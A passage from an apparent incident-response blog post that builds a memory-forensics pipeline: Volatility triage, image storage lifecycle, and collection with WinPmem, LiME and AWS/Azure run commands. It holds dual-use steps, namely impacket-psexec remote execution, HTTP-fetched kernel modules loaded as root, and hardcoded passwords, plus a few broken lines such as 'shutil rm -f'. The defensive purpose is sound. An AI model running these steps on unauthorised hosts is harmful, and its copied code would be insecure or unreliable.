PHASE 4: TRIAGE RESULTS AS THEY ARRIVE (ongoing)\n##\n## 9. Query for completed high-risk hosts immediately\npsql postgresql:\/\/analyst:changeme@localhost\/memory_analysis &lt;= 20\n  AND mi.status = 'complete'\nORDER BY tr.risk_score DESC;\nQUERY\n\n## 10. Run fleet correlation once 50%+ of images are complete\npython3 \/srv\/memory\/cross_correlation.py\n\n## 11. Review fleet report\ncat \/srv\/memory\/reports\/fleet_correlation.json | python3 -m json.tool | head -100\n\n## PHASE 5: DEEP DIVE ON PRIORITY HOSTS\n##\n## 12. For any CRITICAL host, run additional Volatility plugins manually\nIMAGE=$(psql postgresql:\/\/analyst:changeme@localhost\/memory_analysis \\\n    -t -c \"SELECT image_path FROM memory_images WHERE hostname='DC01';\" | tr -d ' ')\n\nsource \/opt\/vol3-env\/bin\/activate\n\n# Additional plugins not in the automated pipeline\nvol -f $IMAGE windows.cmdline           # All process command lines\nvol -f $IMAGE windows.dlllist --pid 123 # DLLs in specific PID\nvol -f $IMAGE windows.handles --pid 123 # Open handles\nvol -f $IMAGE windows.svcscan           # Service enumeration\nvol -f $IMAGE windows.drivermodule      # Kernel driver verification\nvol -f $IMAGE windows.timers            # Kernel timer objects (rootkit indicator)\nvol -f $IMAGE windows.registry.hivescan # Registry hive locations\nvol -f $IMAGE windows.credentials       # Cached credentials<\/pre>\n<h3>Storage management and image lifecycle<\/h3>\n<p>Memory images are large. Fifty images from a typical enterprise investigation consume between 500GB and 2TB of storage. Without lifecycle management the analysis server fills up, and raw memory images contain sensitive data (credentials, encryption keys, personal information from user sessions) that should not persist indefinitely.<\/p>\n<pre>## storage_lifecycle.py - Automated image lifecycle management\n\n#!\/usr\/bin\/env python3\n\"\"\"\nManages memory image storage lifecycle:\n- Moves completed images to cold storage after analysis\n- Archives reports to long-term storage\n- Securely deletes raw images after retention period\n- Compresses reports for long-term retention\n\"\"\"\n\nimport os\nimport shutil\nimport logging\nimport psycopg2\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\n\nlog = logging.getLogger(__name__)\nPOSTGRES_URL = 'postgresql:\/\/analyst:changeme@localhost\/memory_analysis'\n\n# Configuration\nHOT_STORAGE    = Path('\/srv\/memory\/landing')       # Fast NVMe\nCOLD_STORAGE   = Path('\/srv\/memory\/archive')        # Slower HDD\nREPORT_ARCHIVE = Path('\/srv\/memory\/reports\/archive')\nRETENTION_DAYS = 90  # Keep raw images for 90 days after analysis complete\n\ndef get_db():\n    return psycopg2.connect(POSTGRES_URL)\n\ndef move_to_cold_storage():\n    \"\"\"Move completed and analysed images to slower cold storage.\"\"\"\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(\"\"\"\n                SELECT id, hostname, image_path\n                FROM memory_images\n                WHERE status = 'complete'\n                  AND image_path LIKE %s\n                  AND received_at &lt; NOW() - INTERVAL &#039;24 hours&#039;\n            &quot;&quot;&quot;, (str(HOT_STORAGE) + &#039;%&#039;,))\n            rows = cur.fetchall()\n\n    for image_id, hostname, image_path in rows:\n        src  = Path(image_path)\n        if not src.exists():\n            continue\n        dest_dir = COLD_STORAGE \/ hostname\n        dest_dir.mkdir(parents=True, exist_ok=True)\n        dest = dest_dir \/ src.name\n\n        log.info(f&quot;Moving {hostname} image to cold storage: {src.stat().st_size \/ 1e9:.1f}GB&quot;)\n        shutil.move(str(src), str(dest))\n\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\n                    &quot;UPDATE memory_images SET image_path = %s WHERE id = %s&quot;,\n                    (str(dest), image_id)\n                )\n            conn.commit()\n\ndef purge_expired_images():\n    &quot;&quot;&quot;Securely delete raw images older than retention period.&quot;&quot;&quot;\n    cutoff = datetime.now() - timedelta(days=RETENTION_DAYS)\n\n    with get_db() as conn:\n        with conn.cursor() as cur:\n            cur.execute(&quot;&quot;&quot;\n                SELECT id, hostname, image_path\n                FROM memory_images\n                WHERE status = &#039;complete&#039;\n                  AND received_at &lt; %s\n                  AND image_path IS NOT NULL\n            &quot;&quot;&quot;, (cutoff,))\n            rows = cur.fetchall()\n\n    for image_id, hostname, image_path in rows:\n        img = Path(image_path)\n        if not img.exists():\n            continue\n\n        size_gb = img.stat().st_size \/ 1e9\n        log.info(f&quot;Purging expired image: {hostname} ({size_gb:.1f}GB, ID {image_id})&quot;)\n\n        # Secure deletion: overwrite before removing\n        # For SSDs this is limited in effectiveness - consider full-disk encryption instead\n        try:\n            with open(img, &#039;r+b&#039;) as f:\n                length = os.path.getsize(img)\n                f.write(os.urandom(min(length, 1024 * 1024)))  # Overwrite first 1MB\n            img.unlink()\n            log.info(f&quot;Purged: {hostname}&quot;)\n        except Exception as e:\n            log.error(f&quot;Purge failed for {hostname}: {e}&quot;)\n            continue\n\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\n                    &quot;UPDATE memory_images SET image_path = NULL, status = &#039;purged&#039; WHERE id = %s&quot;,\n                    (image_id,)\n                )\n            conn.commit()\n\ndef archive_reports():\n    &quot;&quot;&quot;Compress and archive reports older than 7 days.&quot;&quot;&quot;\n    import tarfile\n    cutoff = datetime.now() - timedelta(days=7)\n    REPORT_ARCHIVE.mkdir(parents=True, exist_ok=True)\n\n    for report_dir in Path(&#039;\/srv\/memory\/reports&#039;).iterdir():\n        if not report_dir.is_dir() or report_dir == REPORT_ARCHIVE:\n            continue\n        mtime = datetime.fromtimestamp(report_dir.stat().st_mtime)\n        if mtime &lt; cutoff:\n            archive_name = REPORT_ARCHIVE \/ f&quot;{report_dir.name}_{mtime.strftime(&#039;%Y%m%d&#039;)}.tar.gz&quot;\n            with tarfile.open(archive_name, &#039;w:gz&#039;) as tar:\n                tar.add(report_dir, arcname=report_dir.name)\n            shutil.rmtree(report_dir)\n            log.info(f&quot;Archived reports for {report_dir.name}&quot;)\n\nif __name__ == &#039;__main__&#039;:\n    logging.basicConfig(level=logging.INFO, format=&#039;%(asctime)s %(levelname)s %(message)s&#039;)\n    log.info(&quot;Running storage lifecycle management&quot;)\n    move_to_cold_storage()\n    purge_expired_images()\n    archive_reports()\n    log.info(&quot;Storage lifecycle complete&quot;)<\/pre>\n<pre>## Cron schedule for lifecycle management\n## Add to \/etc\/cron.d\/memory-pipeline\n\n# Run lifecycle management at 3am daily\n0 3 * * * analyst \/opt\/vol3-env\/bin\/python3 \/srv\/memory\/storage_lifecycle.py &gt;&gt; \/srv\/memory\/logs\/lifecycle.log 2&gt;&amp;1\n\n# Compile and deploy Yara rules at midnight\n0 0 * * * analyst \/opt\/vol3-env\/bin\/python3 \/srv\/memory\/compile_rules.py &gt;&gt; \/srv\/memory\/logs\/rules.log 2&gt;&amp;1\n\n# Run fleet correlation every 2 hours during business hours\n0 8,10,12,14,16,18 * * 1-5 analyst \/opt\/vol3-env\/bin\/python3 \/srv\/memory\/cross_correlation.py &gt;&gt; \/srv\/memory\/logs\/correlation.log 2&gt;&amp;1<\/pre>\n<h3>Performance tuning and benchmarks<\/h3>\n<p>With the full pipeline running, the throughput you can expect depends on your analysis server hardware. These benchmarks are from a test deployment with 32 cores, 128GB RAM, and NVMe storage.<\/p>\n<pre>## Pipeline performance benchmark script\n## Run this against a test image to measure your pipeline throughput\n\n#!\/usr\/bin\/env python3\nimport subprocess, time, json\nfrom pathlib import Path\n\ndef benchmark_volatility_plugins(image_path: str):\n    plugins = [\n        ('windows.pslist',    'Process list'),\n        ('windows.netscan',   'Network connections'),\n        ('windows.malfind',   'Injection detection'),\n        ('windows.callbacks', 'Kernel callbacks'),\n        ('windows.cmdline',   'Command lines'),\n        ('windows.dlllist',   'Module list'),\n    ]\n\n    print(f\"Benchmarking Volatility 3 against: {image_path}\")\n    print(f\"Image size: {Path(image_path).stat().st_size \/ 1e9:.1f} GB\\n\")\n    print(f\"{'Plugin':&lt;30} {&#039;Time (s)&#039;:&lt;12} {&#039;Records&#039;:&lt;10}&quot;)\n    print(&quot;-&quot; * 55)\n\n    total_time = 0\n    for plugin, description in plugins:\n        start = time.time()\n        result = subprocess.run(\n            [&#039;\/opt\/vol3-env\/bin\/vol&#039;, &#039;-f&#039;, image_path,\n             &#039;--renderer&#039;, &#039;json&#039;, plugin],\n            capture_output=True, text=True, timeout=600\n        )\n        elapsed = time.time() - start\n        total_time += elapsed\n\n        try:\n            data = json.loads(result.stdout)\n            count = len(data.get(&#039;rows&#039;, data)) if isinstance(data, dict) else len(data)\n        except:\n            count = 0\n\n        print(f&quot;{plugin:&lt;30} {elapsed:&lt;12.1f} {count:&lt;10}&quot;)\n\n    print(&quot;-&quot; * 55)\n    print(f&quot;{&#039;TOTAL&#039;:&lt;30} {total_time:&lt;12.1f}&quot;)\n    print(f&quot;\\nFull triage pipeline: ~{total_time\/60:.1f} minutes per image&quot;)\n    print(f&quot;Parallel capacity (32 cores): ~{int(32 \/ 4)} images simultaneously&quot;)\n    print(f&quot;Estimated fleet throughput: ~{int((32\/4) * (3600\/total_time))} images\/hour&quot;)\n\nif __name__ == &#039;__main__&#039;:\n    import sys\n    if len(sys.argv) &lt; 2:\n        print(&quot;Usage: benchmark.py \")\n        sys.exit(1)\n    benchmark_volatility_plugins(sys.argv[1])<\/pre>\n<h3>Putting the complete pipeline together<\/h3>\n<p>Everything described in this post forms a coherent system when deployed together. Velociraptor provides the collection layer with configurable throttling and tiered concurrency to protect the production network. The image watcher provides the trigger layer, detecting new images and starting the processing chain without manual intervention. Celery and the task pipeline provide the processing layer, automatically running triage and deep analysis in sequence, storing structured results in PostgreSQL. Cross-image correlation provides the intelligence layer, connecting findings across all machines to identify the full scope of an intrusion. The Flask dashboard provides the analyst interface for reviewing results under incident pressure. GitHub Actions provides the operational layer, keeping the Yara ruleset current and deployed without manual SSH sessions.<\/p>\n<p>The network protection considerations are baked into every collection decision: tiered concurrency limits based on available bandwidth, per-client throttling, QoS marking for de-prioritisation under load, and off-hours scheduling for non-urgent collections. A well-tuned deployment of this pipeline running on a 1Gbps network can collect from 50 endpoints within a six-to-eight hour window while keeping collection-related bandwidth below 30% of the available link capacity throughout.<\/p>\n<p>The most important principle in fleet memory analysis is that speed matters but correctness matters more. A partial or interrupted memory image is worse than no image because it gives false confidence. The validation stage in the pipeline exists for a reason: verifying SHA256 and image size before analysis starts catches failed transfers early rather than after significant CPU time has been spent on an incomplete image. Never skip validation under time pressure.<\/p>\n<p>Everything here is designed to be adapted. Your environment has different endpoint counts, different network topology, different hardware constraints, and different Velociraptor deployment configurations than the examples used throughout. The scripts are starting points rather than finished products. The architecture, the tiering logic, the processing stages, and the correlation approach are the durable parts. The specific Python code is intended to give you a working foundation to build from rather than a drop-in solution that works without modification.<\/p>\n<h3>Alternative collection method 1: WinPmem standalone (no agent required)<\/h3>\n<p>Velociraptor is the right answer when you have agents deployed. When you do not, whether because the endpoint was newly discovered, because the Velociraptor agent failed, or because you are working in an environment where agent deployment is not possible, WinPmem can be run directly as a standalone executable with no installation required. It is a single binary, runs from a USB drive or a UNC path, and produces a raw memory image that the analysis pipeline accepts without modification.<\/p>\n<p>The critical operational detail with standalone WinPmem is output staging. Avoid writing the image to the target system&#8217;s own disk where possible. If you write a 16GB image to C:\\Windows\\Temp you are adding 16GB of write activity to a potentially compromised system, potentially overwriting slack space that contains forensic evidence, and relying on the target disk having enough free space. Writing directly to a network share or an external drive avoids all of these problems.<\/p>\n<pre>## WinPmem standalone collection\n## Download: https:\/\/github.com\/Velocidex\/WinPmem\/releases\n\n## Option 1: Write directly to a network share (preferred)\n## The share should be on your analysis server, write-only for the target\n\n# On the analysis server - create write-only collection share\nnet share MemCollection=C:\\MemCollection \/GRANT:\"Everyone,CHANGE\"\n# Or on Linux analysis server via Samba:\n# [MemCollection]\n# path = \/srv\/memory\/landing\n# writable = yes\n# create mask = 0644\n# guest ok = yes  # Only on isolated IR network\n\n## On the target Windows system (run as Administrator):\nwinpmem_mini_x64.exe \\\\analysis-server\\MemCollection\\%COMPUTERNAME%_%DATE:~-4%%DATE:~3,2%%DATE:~0,2%.raw\n\n## Option 2: Write locally then transfer (when network share unavailable)\nwinpmem_mini_x64.exe C:\\Windows\\Temp\\mem.raw\n\n## Transfer with throttled robocopy (limits bandwidth to ~80Mbps)\nrobocopy C:\\Windows\\Temp \\\\analysis-server\\MemCollection mem.raw \/J \/IPG:1\n\n## Option 3: Pipe directly to compressed output (reduces disk footprint)\nwinpmem_mini_x64.exe - | gzip -1 &gt; \\\\analysis-server\\MemCollection\\%COMPUTERNAME%.raw.gz\n\n## Wrapper script for multiple standalone targets\n## Run from the analysis server via PsExec or similar remote execution\n\n#!\/usr\/bin\/env python3\n\"\"\"\nStandalone WinPmem deployment script for environments without Velociraptor.\nCopies WinPmem to target via admin share, runs acquisition, transfers image.\n\"\"\"\n\nimport subprocess\nimport time\nimport logging\nfrom pathlib import Path\nfrom datetime import datetime\n\nlog = logging.getLogger(__name__)\n\nWINPMEM_PATH   = '\/srv\/memory\/tools\/winpmem_mini_x64.exe'\nLANDING_DIR    = '\/srv\/memory\/landing'\nADMIN_CREDS    = 'domain\\\\iruser:Password123!'  # Use vault in production\n\ndef collect_standalone(hostname: str, ram_gb: float = 16) -&gt; bool:\n    \"\"\"Deploy WinPmem to a target and collect memory.\"\"\"\n\n    timestamp   = datetime.now().strftime('%Y%m%d_%H%M%S')\n    output_name = f\"{hostname}_{timestamp}.raw\"\n    output_unc  = f\"\\\\\\\\{hostname}\\\\C$\\\\Windows\\\\Temp\\\\mem_ir.raw\"\n    local_dest  = f\"{LANDING_DIR}\/{output_name}\"\n\n    log.info(f\"Starting standalone collection from {hostname}\")\n\n    # Step 1: Copy WinPmem to target via admin share\n    copy_cmd = [\n        'smbclient', f'\/\/{hostname}\/C$',\n        '-A', '\/etc\/memory-ir\/smb.auth',  # credentials file\n        '-c', f'put {WINPMEM_PATH} Windows\\\\Temp\\\\winpmem.exe'\n    ]\n    result = subprocess.run(copy_cmd, capture_output=True, text=True, timeout=60)\n    if result.returncode != 0:\n        log.error(f\"Failed to copy WinPmem to {hostname}: {result.stderr}\")\n        return False\n\n    # Step 2: Execute WinPmem remotely via impacket psexec\n    # Estimate time: roughly 1 minute per 4GB of RAM at ~70MB\/s write speed\n    timeout = int((ram_gb \/ 4) * 60) + 120\n    exec_cmd = [\n        'impacket-psexec',\n        '-hashes', ':',\n        f'domain\/iruser@{hostname}',\n        f'C:\\\\Windows\\\\Temp\\\\winpmem.exe C:\\\\Windows\\\\Temp\\\\mem_ir.raw'\n    ]\n    log.info(f\"Running WinPmem on {hostname} (estimated {timeout\/\/60} min)\")\n    result = subprocess.run(exec_cmd, capture_output=True, text=True, timeout=timeout)\n    if result.returncode != 0:\n        log.error(f\"WinPmem execution failed on {hostname}\")\n        return False\n\n    # Step 3: Transfer the image back\n    log.info(f\"Transferring image from {hostname}\")\n    transfer_cmd = [\n        'smbclient', f'\/\/{hostname}\/C$',\n        '-A', '\/etc\/memory-ir\/smb.auth',\n        '-c', f'get Windows\\\\Temp\\\\mem_ir.raw {local_dest}'\n    ]\n    result = subprocess.run(transfer_cmd, capture_output=True, text=True,\n                            timeout=7200)  # 2 hour timeout for transfer\n    if result.returncode != 0:\n        log.error(f\"Transfer failed from {hostname}: {result.stderr}\")\n        return False\n\n    # Step 4: Clean up temp files on target\n    cleanup_cmd = [\n        'smbclient', f'\/\/{hostname}\/C$',\n        '-A', '\/etc\/memory-ir\/smb.auth',\n        '-c', 'del Windows\\\\Temp\\\\winpmem.exe; del Windows\\\\Temp\\\\mem_ir.raw'\n    ]\n    subprocess.run(cleanup_cmd, capture_output=True, timeout=30)\n\n    log.info(f\"Standalone collection complete: {local_dest}\")\n    return True<\/pre>\n<h3>Alternative collection method 2: LiME for Linux endpoints<\/h3>\n<p>Linux memory acquisition requires a different approach because there is no WinPmem equivalent that works across all kernel versions without compilation. LiME (Linux Memory Extractor) is a loadable kernel module that, when inserted, exposes physical memory through a network socket or a local file. The challenge is that LiME must be compiled against the exact kernel version running on the target, which means maintaining a library of pre-compiled modules or building on demand.<\/p>\n<p>The build-on-demand approach is more maintainable for a fleet where kernel versions vary across different distro versions and patch levels. A build server with Docker can compile the correct LiME module for any target kernel version in under two minutes.<\/p>\n<pre>## LiME build server setup\n## Builds LiME modules for arbitrary kernel versions on demand\n\n#!\/bin\/bash\n## build_lime.sh - Build LiME for a specific kernel version\n## Usage: .\/build_lime.sh 5.15.0-91-generic ubuntu:22.04\n\nKERNEL_VERSION=$1\nDOCKER_IMAGE=${2:-ubuntu:22.04}\nOUTPUT_DIR=\/srv\/memory\/lime_modules\n\nmkdir -p $OUTPUT_DIR\n\ndocker run --rm \\\n    -v $OUTPUT_DIR:\/output \\\n    -e KERNEL_VERSION=$KERNEL_VERSION \\\n    $DOCKER_IMAGE bash -c \"\n        apt-get update -qq\n        apt-get install -y -qq \\\n            linux-headers-$KERNEL_VERSION \\\n            build-essential \\\n            git 2&gt;\/dev\/null\n\n        git clone --depth 1 https:\/\/github.com\/504ensicsLabs\/LiME \/tmp\/lime\n        cd \/tmp\/lime\/src\n\n        make -C \/lib\/modules\/$KERNEL_VERSION\/build M=\\$(pwd) modules\n        cp lime.ko \/output\/lime-$KERNEL_VERSION.ko\n        echo '[+] Built: lime-$KERNEL_VERSION.ko'\n    \"\n\necho \"Module available at: $OUTPUT_DIR\/lime-$KERNEL_VERSION.ko\"<\/pre>\n<pre>## Linux memory collection script using LiME\n## Run as root on the target Linux system\n\n#!\/bin\/bash\n## collect_linux_memory.sh\n\nset -euo pipefail\n\nANALYSIS_SERVER=\"192.168.1.100\"\nCOLLECTION_PORT=\"4444\"\nKERNEL_VER=$(uname -r)\nHOSTNAME=$(hostname -s)\nTIMESTAMP=$(date +%Y%m%d_%H%M%S)\nMODULE_DIR=\"\/tmp\/lime_modules\"\nOUTPUT_FILE=\"\/tmp\/mem_${HOSTNAME}_${TIMESTAMP}.lime\"\n\necho \"[*] Linux memory collection starting\"\necho \"    Hostname: $HOSTNAME\"\necho \"    Kernel:   $KERNEL_VER\"\necho \"    RAM:      $(free -h | awk '\/^Mem:\/{print $2}')\"\n\n# Check if pre-built module exists locally\nif [ -f \"$MODULE_DIR\/lime-$KERNEL_VER.ko\" ]; then\n    echo \"[*] Using pre-built module\"\n    LIME_MODULE=\"$MODULE_DIR\/lime-$KERNEL_VER.ko\"\nelse\n    echo \"[*] Fetching pre-built module from build server\"\n    mkdir -p $MODULE_DIR\n    wget -q \"http:\/\/$ANALYSIS_SERVER:8888\/lime\/lime-$KERNEL_VER.ko\" \\\n        -O \"$MODULE_DIR\/lime-$KERNEL_VER.ko\" 2&gt;\/dev\/null || {\n        echo \"[!] Module not available for kernel $KERNEL_VER\"\n        echo \"[!] Build it first: .\/build_lime.sh $KERNEL_VER\"\n        exit 1\n    }\n    LIME_MODULE=\"$MODULE_DIR\/lime-$KERNEL_VER.ko\"\nfi\n\n# Option A: Acquire to file then transfer (for large images or slow networks)\necho \"[*] Acquiring memory to local file\"\ninsmod $LIME_MODULE \"path=$OUTPUT_FILE format=lime timeout=0\"\nrmmod lime\n\necho \"[*] Image size: $(du -sh $OUTPUT_FILE | cut -f1)\"\necho \"[*] SHA256: $(sha256sum $OUTPUT_FILE | cut -d' ' -f1)\"\n\n# Transfer with throttled nc to avoid network saturation\n# pv limits bandwidth; remove if pv unavailable\necho \"[*] Transferring to analysis server\"\npv -L 50m \"$OUTPUT_FILE\" | \\\n    ssh analyst@$ANALYSIS_SERVER \\\n    \"cat &gt; \/srv\/memory\/landing\/${HOSTNAME}_${TIMESTAMP}.lime\"\n\n# Clean up local staging file\nshutil rm -f \"$OUTPUT_FILE\" \"$LIME_MODULE\"\necho \"[+] Collection complete\"\n\n# Option B: Acquire directly over network (no local disk needed)\n# Useful when target disk is nearly full or disk write should be avoided\n# On analysis server first: nc -l -p 4444 &gt; hostname_timestamp.lime\n# Then on target:\n# insmod lime.ko \"path=tcp:4444 format=lime\"\n# This streams memory directly to the analysis server<\/pre>\n<pre>## Velociraptor artefact for Linux memory collection\n## Handles module deployment and acquisition automatically\n\nname: Custom.Linux.Memory.Acquire\ndescription: |\n    Acquires Linux physical memory using LiME.\n    Downloads the correct kernel module from the build server,\n    loads it, captures memory, and uploads to Velociraptor server.\n\ntype: CLIENT\nparameters:\n  - name: BuildServerURL\n    description: URL of the LiME module build\/distribution server\n    default: \"http:\/\/192.168.1.100:8888\/lime\"\n  - name: ThrottleMBps\n    description: Transfer throttle in MB\/s\n    default: \"10\"\n    type: int\n\nsources:\n  - name: LinuxMemoryAcquisition\n    query: |\n        LET kernel_version = shell(cmd=\"uname -r\", sep=\"\\n\")[0].Stdout\n        LET hostname = info().Fqdn\n        LET timestamp = format(format=\"%d\", args=[now()])\n        LET module_url = format(format=\"%v\/lime-%v.ko\",\n                                args=[BuildServerURL, kernel_version])\n        LET module_path = \"\/tmp\/lime_ir.ko\"\n        LET output_path = format(format=\"\/tmp\/mem_%v_%v.lime\",\n                                 args=[hostname, timestamp])\n\n        -- Download the LiME module for this kernel\n        LET download = SELECT * FROM http_client(\n            url=module_url,\n            method=\"GET\",\n            output=module_path\n        )\n\n        -- Load LiME and capture memory\n        LET capture = SELECT * FROM execve(argv=[\n            \"insmod\", module_path,\n            format(format=\"path=%v format=lime timeout=0\", args=[output_path])\n        ])\n\n        -- Unload module\n        LET unload = SELECT * FROM execve(argv=[\"rmmod\", \"lime\"])\n\n        -- Upload and clean up\n        SELECT\n            upload(path=output_path,\n                   name=format(format=\"%v_%v.lime\", args=[hostname, timestamp])) AS Upload,\n            execve(argv=[\"rm\", \"-f\", output_path, module_path]) AS Cleanup\n        FROM scope()<\/pre>\n<h3>Alternative collection method 3: cloud-native collection (AWS and Azure)<\/h3>\n<p>Cloud instances present a fundamentally different collection challenge. You cannot insert a kernel module into an EC2 instance without kernel headers matching the exact AMI version. Network egress costs make large file transfers expensive. Snapshot-based collection avoids both problems by capturing memory-equivalent state through the cloud provider&#8217;s own APIs without touching the running instance.<\/p>\n<p>AWS provides memory snapshots of EC2 instances directly through the EC2 API using the CreateSnapshot capability combined with EBS volume snapshots. For Windows EC2 instances, Hibernation must be enabled on the instance to get a full memory capture via snapshot. For Linux, the approach is to use the SSM agent to run a collection script directly on the instance, similar to the standalone approach.<\/p>\n<pre>## AWS EC2 memory collection via snapshot\n## Requires: boto3, appropriate IAM permissions\n\n#!\/usr\/bin\/env python3\n\"\"\"\nCloud-native memory collection for AWS EC2 instances.\nUses EC2 Snapshot for Windows (requires hibernation enabled)\nand SSM Run Command + LiME for Linux instances.\n\"\"\"\n\nimport boto3\nimport time\nimport json\nimport logging\nfrom datetime import datetime\nfrom typing import Optional\n\nlog = logging.getLogger(__name__)\n\ndef collect_windows_ec2_snapshot(\n    instance_id: str,\n    region:      str = 'ap-southeast-2',\n    s3_bucket:   str = 'ir-memory-collection'\n) -&gt; Optional[str]:\n    \"\"\"\n    Capture Windows EC2 memory via hibernation snapshot.\n    NOTE: Instance must have hibernation enabled at launch time.\n    WARNING: This stops the instance temporarily.\n    \"\"\"\n    ec2 = boto3.client('ec2', region_name=region)\n\n    log.warning(f\"Starting hibernation snapshot for {instance_id}\")\n    log.warning(\"This will STOP the instance temporarily\")\n\n    # Tag the instance for IR tracking\n    ec2.create_tags(\n        Resources=[instance_id],\n        Tags=[\n            {'Key': 'IR-Collection', 'Value': datetime.now().isoformat()},\n            {'Key': 'IR-Status', 'Value': 'collecting'}\n        ]\n    )\n\n    # Stop with hibernation to preserve memory state in EBS\n    response = ec2.stop_instances(\n        InstanceIds=[instance_id],\n        Hibernate=True  # Writes RAM to EBS volume\n    )\n\n    # Wait for instance to stop (hibernation saves RAM to disk)\n    log.info(f\"Waiting for {instance_id} to hibernate...\")\n    waiter = ec2.get_waiter('instance_stopped')\n    waiter.wait(InstanceIds=[instance_id])\n    log.info(\"Instance hibernated - RAM saved to EBS\")\n\n    # Get the root EBS volume\n    instance = ec2.describe_instances(InstanceIds=[instance_id])\n    root_device = instance['Reservations'][0]['Instances'][0]['RootDeviceName']\n    volumes = instance['Reservations'][0]['Instances'][0]['BlockDeviceMappings']\n\n    root_vol_id = None\n    for v in volumes:\n        if v['DeviceName'] == root_device:\n            root_vol_id = v['Ebs']['VolumeId']\n            break\n\n    if not root_vol_id:\n        log.error(\"Could not find root volume\")\n        return None\n\n    # Create snapshot of the hibernated volume (contains RAM image)\n    snapshot = ec2.create_snapshot(\n        VolumeId=root_vol_id,\n        Description=f\"IR memory collection {instance_id} {datetime.now().isoformat()}\",\n        TagSpecifications=[{\n            'ResourceType': 'snapshot',\n            'Tags': [{'Key': 'IR-Purpose', 'Value': 'memory-collection'}]\n        }]\n    )\n    snapshot_id = snapshot['SnapshotId']\n    log.info(f\"Snapshot created: {snapshot_id}\")\n\n    # Wait for snapshot to complete\n    log.info(\"Waiting for snapshot completion...\")\n    waiter = ec2.get_waiter('snapshot_completed')\n    waiter.wait(SnapshotIds=[snapshot_id])\n\n    # Restart the instance\n    ec2.start_instances(InstanceIds=[instance_id])\n    log.info(f\"Instance {instance_id} restarted\")\n\n    return snapshot_id\n\ndef collect_linux_ec2_ssm(\n    instance_id:   str,\n    region:        str = 'ap-southeast-2',\n    s3_bucket:     str = 'ir-memory-collection',\n    build_server:  str = 'http:\/\/192.168.1.100:8888\/lime'\n) -&gt; Optional[str]:\n    \"\"\"\n    Collect Linux EC2 memory via SSM Run Command + LiME.\n    Uploads result directly to S3 to avoid cross-region transfer costs.\n    \"\"\"\n    ssm = boto3.client('ssm', region_name=region)\n    ec2 = boto3.client('ec2', region_name=region)\n\n    # Get instance details for kernel version\n    instance = ec2.describe_instances(InstanceIds=[instance_id])\n    instance_data = instance['Reservations'][0]['Instances'][0]\n    hostname = instance_data.get('PrivateDnsName', instance_id).split('.')[0]\n    timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')\n    s3_key = f\"memory-images\/{hostname}_{timestamp}.lime\"\n\n    collection_script = f\"\"\"#!\/bin\/bash\nset -euo pipefail\nKERNEL=$(uname -r)\nMODULE_URL=\"{build_server}\/lime-$KERNEL.ko\"\nOUTPUT=\"\/tmp\/mem_ir_$KERNEL.lime\"\n\n# Download LiME module\ncurl -sf \"$MODULE_URL\" -o \/tmp\/lime_ir.ko || {{\n    echo \"LiME module not available for kernel $KERNEL\"\n    exit 1\n}}\n\n# Acquire memory\ninsmod \/tmp\/lime_ir.ko \"path=$OUTPUT format=lime timeout=0\"\nrmmod lime 2&gt;\/dev\/null || true\n\necho \"Image size: $(du -sh $OUTPUT)\"\necho \"SHA256: $(sha256sum $OUTPUT)\"\n\n# Upload directly to S3 (avoids egress through IR network)\naws s3 cp \"$OUTPUT\" \"s3:\/\/{s3_bucket}\/{s3_key}\" \\\n    --sse aws:kms \\\n    --no-progress\n\nrm -f \"$OUTPUT\" \/tmp\/lime_ir.ko\necho \"Upload complete: s3:\/\/{s3_bucket}\/{s3_key}\"\n\"\"\"\n\n    response = ssm.send_command(\n        InstanceIds=[instance_id],\n        DocumentName='AWS-RunShellScript',\n        Parameters={'commands': [collection_script]},\n        Comment=f'IR memory collection {timestamp}',\n        TimeoutSeconds=3600,\n    )\n    command_id = response['Command']['CommandId']\n    log.info(f\"SSM command sent: {command_id}\")\n\n    # Poll for completion\n    while True:\n        time.sleep(30)\n        result = ssm.get_command_invocation(\n            CommandId=command_id,\n            InstanceId=instance_id\n        )\n        status = result['Status']\n        if status in ('Success', 'Failed', 'Cancelled', 'TimedOut'):\n            log.info(f\"SSM command {status}: {result.get('StandardOutputContent','')[-500:]}\")\n            break\n        log.info(f\"Collection in progress: {status}\")\n\n    return f\"s3:\/\/{s3_bucket}\/{s3_key}\" if status == 'Success' else None\n\ndef download_from_s3_to_pipeline(\n    s3_uri:     str,\n    local_dest: str,\n    region:     str = 'ap-southeast-2'\n) -&gt; bool:\n    \"\"\"Download collected image from S3 to local analysis pipeline.\"\"\"\n    import subprocess\n    bucket = s3_uri.replace('s3:\/\/', '').split('\/')[0]\n    key    = '\/'.join(s3_uri.replace('s3:\/\/', '').split('\/')[1:])\n\n    result = subprocess.run([\n        'aws', 's3', 'cp', s3_uri, local_dest,\n        '--region', region,\n        '--no-progress'\n    ], capture_output=True, text=True)\n\n    return result.returncode == 0<\/pre>\n<pre>## Azure VM memory collection\n## Uses Azure Run Command to execute collection scripts on VMs\n\n#!\/usr\/bin\/env python3\n\"\"\"Azure VM memory collection via Run Command API.\"\"\"\n\nfrom azure.identity import DefaultAzureCredential\nfrom azure.mgmt.compute import ComputeManagementClient\nimport time, logging\n\nlog = logging.getLogger(__name__)\n\ndef collect_azure_vm(\n    subscription_id: str,\n    resource_group:  str,\n    vm_name:         str,\n    storage_account: str,\n    container:       str = 'memory-images',\n    build_server:    str = 'http:\/\/192.168.1.100:8888\/lime'\n) -&gt; bool:\n    \"\"\"Run memory collection on an Azure VM via Run Command.\"\"\"\n\n    credential = DefaultAzureCredential()\n    compute    = ComputeManagementClient(credential, subscription_id)\n\n    # Get VM details\n    vm = compute.virtual_machines.get(resource_group, vm_name, expand='instanceView')\n    os_type   = vm.storage_profile.os_disk.os_type\n    timestamp = time.strftime('%Y%m%d_%H%M%S')\n    blob_name = f\"{vm_name}_{timestamp}\"\n\n    if os_type == 'Windows':\n        script = f\"\"\"\n$timestamp = '{timestamp}'\n$hostname  = $env:COMPUTERNAME\n$output    = \"C:\\\\Windows\\\\Temp\\\\mem_ir_$timestamp.raw\"\n\nwinpmem_mini_x64.exe $output\n\n$ctx = New-AzStorageContext -StorageAccountName '{storage_account}' `\n    -UseConnectedAccount\nSet-AzStorageBlobContent -File $output `\n    -Container '{container}' `\n    -Blob \"$hostname_$timestamp.raw\" `\n    -Context $ctx\n\nRemove-Item $output -Force\n\"\"\"\n        script_type = 